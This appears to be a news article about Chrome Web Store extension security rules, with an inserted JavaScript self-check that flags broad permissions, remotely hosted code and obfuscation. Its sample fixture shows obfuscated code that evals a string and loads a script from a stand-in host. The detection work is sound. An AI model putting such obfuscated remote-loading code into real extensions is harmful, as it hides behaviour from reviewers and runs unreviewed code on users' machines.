Over the past 10 years, the Chrome Web Store has grown to over 180,000 extensions that let desktop users customize Chrome and their web experience. For the uninitiated, extensions are small software programs that customize the browsing experience, letting users mold Chrome's functionality and behavior to their individual needs or preferences. Today, Google announced a number of changes to how extensions are handled, especially those that request a considerable number of permissions. It also announced a set of new requirements for developers who wish to publish their extensions on the Chrome Web Store.
On the need for trustworthy extensions, the Chromium blog states: “it’s crucial that users be able to trust the extensions they install are safe, privacy-preserving, and performant. Users should always have full transparency about the scope of their extensions’ capabilities and data access”. Chrome has recently taken steps to improve extension security, including the launch of out-of-process iframes, the removal of inline installation, and improvements in its ability to detect and block malicious extensions. Today it added new changes to these existing rules, along with its plans for the future.
Starting with Chrome 70, users can restrict an extension's host access to a custom list of sites, or configure extensions to require a click before they are allowed access to the current page. As a result, most Chrome extensions will lose their default ability to see and manipulate every website the user visits, which improves user transparency and control over extensions. A transition guide describes how this works when an extension requires your permission.
In addition, Google says that any extension requesting a “powerful permission” will be put under closer scrutiny. Extensions that use remotely hosted code, which can be altered at any time after review, will also be inspected closely. To reduce review time, Chrome advises developers to include their code entirely within the extension package and to request the narrowest range of permissions they need.
The Chrome Web Store will strictly disallow any extension with obfuscated code, whether that code is available within the extension package or in an externally fetched resource. This applies from today onwards to any new extension submitted. Existing Chrome extensions can continue, but they will be required to comply within 90 days, failing which they will also be removed from the Chrome Web Store. This follows Chrome’s claim that over 70% of malicious extensions run on obfuscated code. The main use of obfuscation is to limit readability and thereby lessen the chances of code theft, but at the same time such code is genuinely difficult to review.
“Ordinary minification, on the other hand, typically speeds up code execution as it reduces code size, and is much more straightforward to review. Thus, minification will still be allowed, including the following techniques:
- Removal of whitespace, newlines, code comments, and block delimiters
- Shortening of variable and function names”
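To make the three review criteria above concrete (broad host permissions, remotely hosted code, and obfuscation as distinct from plain minification), here is an added example of a pre-submission self-check a developer could run over their own package before uploading it. It is not Google's or the Chrome Web Store's tooling, and every pattern and threshold in it is an assumption made for illustration; the store's actual review logic is not described on this page. The sample manifest and the two source snippets are constructed for the example.

```javascript
// Added example, not Google's or the Chrome Web Store's own tooling.
// A pre-submission self-check an extension author could run over a package,
// mirroring the review criteria the article names: broad host permissions,
// remotely hosted code, and obfuscation. Every pattern below is an assumption
// for illustration, not the store's actual (non-public) review logic.

// Host patterns that match every site; explicit origins are narrower.
const BROAD_HOST_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Returns the manifest permission entries that grant access to all sites.
// (Both the v2 "permissions" key and the v3 "host_permissions" key are read.)
function findBroadHostPermissions(manifest) {
  const entries = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ];
  return entries.filter((p) => BROAD_HOST_PATTERNS.has(p));
}

// Returns http(s) URLs that are loaded as code rather than as data. Loading
// a <script src=...>, importScripts() or import() from the network is the
// "remotely hosted code" the article says receives closer inspection.
function findRemoteCodeReferences(source) {
  const re = /(?:importScripts\(|<script[^>]*\bsrc=|import\()\s*["']?(https?:\/\/[^"')\s>]+)/g;
  const found = [];
  let m;
  while ((m = re.exec(source)) !== null) found.push(m[1]);
  return found;
}

// Heuristic obfuscation signals. Ordinary minification (stripped whitespace,
// shortened names) contributes nothing here; the signals counted exist to
// hide what code does rather than to shrink it. Threshold is an assumption.
function obfuscationSignals(source) {
  const signals = {
    hexEscapedStrings: (source.match(/\\x[0-9a-fA-F]{2}/g) || []).length,
    hexStyleIdentifiers: (source.match(/\b_0x[0-9a-fA-F]{4,}\b/g) || []).length,
    dynamicEval: (source.match(/\beval\s*\(|\bnew\s+Function\s*\(/g) || []).length,
    runtimeDecoding: (source.match(/String\.fromCharCode\s*\(|\batob\s*\(/g) || []).length,
  };
  const total = Object.values(signals).reduce((a, b) => a + b, 0);
  return { ...signals, total, looksObfuscated: total >= 3 };
}

// Full check over a manifest and a map of file name -> source text.
// Returns human-readable findings; an empty list means nothing was flagged.
function reviewPackage(manifest, sources) {
  const findings = [];
  for (const p of findBroadHostPermissions(manifest)) {
    findings.push(`broad host permission: ${p}`);
  }
  for (const [file, src] of Object.entries(sources)) {
    for (const url of findRemoteCodeReferences(src)) {
      findings.push(`${file}: remotely hosted code ${url}`);
    }
    const o = obfuscationSignals(src);
    if (o.looksObfuscated) findings.push(`${file}: looks obfuscated (${o.total} signals)`);
  }
  return findings;
}

// Constructed sample inputs (not a real extension).
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "example-extension",
  permissions: ["storage", "<all_urls>"],
};

// Minified but still reviewable: whitespace stripped, names shortened.
const MINIFIED = "function a(b){return b.map(function(c){return c*2})}";

// Obfuscated: strings hidden behind hex escapes and base64, decoded at
// runtime and passed to eval, plus a script pulled from a remote host.
const OBFUSCATED =
  'var _0x4a1b=["\\x61\\x6c\\x65\\x72\\x74"];' +
  'var _0x2c3d=atob("ZG9jdW1lbnQ=");' +
  'eval(_0x4a1b[0]+"(1)");' +
  'importScripts("https://cdn.example.invalid/loader.js");';

if (typeof require !== "undefined" && require.main === module) {
  const findings = reviewPackage(SAMPLE_MANIFEST, { "min.js": MINIFIED, "obf.js": OBFUSCATED });
  for (const f of findings) console.log(f);
}
```

Run with `node`, the minified sample produces no findings while the obfuscated sample is flagged twice (remote code and obfuscation), and the manifest is flagged once for `<all_urls>`. The point of separating `obfuscationSignals` from the other checks is the one the article makes: whitespace removal and identifier shortening leave these counters at zero, so a minifier's output passes while code that decodes itself at runtime does not.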
From the start of the new year, Google will require two-step verification for all developer accounts. Once an extension becomes popular, it risks being taken over through a hijacked developer account. Two-step verification adds an extra layer of security, with the second factor tied either to a phone number or to a “physical security key”. Google also suggests considering the Advanced Protection Program, which offers the security Google gives its own employees.
2019 will also see the introduction of the next version of the Chrome extensions manifest. Manifest v3 will bring further platform changes aimed at stronger security, privacy, and performance guarantees.